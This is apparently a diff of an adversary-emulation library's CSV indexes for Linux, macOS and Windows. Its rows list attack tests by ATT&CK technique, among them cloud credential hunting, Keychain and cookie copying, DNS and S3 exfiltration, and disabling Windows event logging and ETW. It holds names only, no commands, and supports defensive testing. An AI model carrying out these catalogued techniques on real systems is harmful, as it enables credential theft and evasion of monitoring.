-lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
@@ -311,9 +313,12 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users
 credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
 credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
-credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
 credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
@@ -382,6 +387,7 @@ discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d27
 discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
 discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
 execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
@@ -442,6 +448,8 @@ exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Ove
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,4,Exfiltrate data as text over HTTPS using wget,8bec51da-7a6d-4346-b941-51eca448c4b0,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
+exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -14,7 +14,10 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
-defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
+defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",4,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
@@ -94,7 +97,6 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-persistence,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
 persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
 persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
@@ -122,6 +124,8 @@ persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with
 persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
 persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
+command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
+command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -146,6 +150,7 @@ collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
 collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
+collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
 lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
@@ -156,7 +161,6 @@ privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
 privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
 privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
@@ -187,9 +191,11 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root acco
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
+credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
 credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
+credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
 credential-access,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
 credential-access,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
@@ -200,10 +206,13 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Priva
 credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
-credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
 credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
 credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
@@ -214,7 +223,10 @@ discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
-discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
 discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
@@ -243,6 +255,7 @@ discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
 execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
@@ -273,5 +286,7 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
+exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -74,6 +74,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
+defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
@@ -90,6 +91,7 @@ defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,2,I
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Clear PowerShell Session History,22c779cd-9445-4d3e-a136-f75adbf0315f,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -147,6 +149,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
@@ -159,6 +164,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,25,ESXi - Set Firewall to PASS Traffic,a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
@@ -272,6 +278,10 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,Disable .NET Eve
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,8,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,9,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,10,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd,fdac1f79-b833-4bab-b4a1-11b1ed676a4b,command_prompt
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,11,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell,b42c1f8c-399b-47ae-8fd8-763181395fee,powershell
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,12,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd,110b4281-43fe-405f-a184-5d8eaf228ebf,command_prompt
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,13,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell,4d61779d-be7f-425c-b560-0cafb2522911,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1070,Indicator Removal on Host,2,Indicator Manipulation using FSUtil,96e86706-6afd-45b6-95d6-108d23eaf2e9,powershell
 defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -358,6 +368,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -590,6 +604,7 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
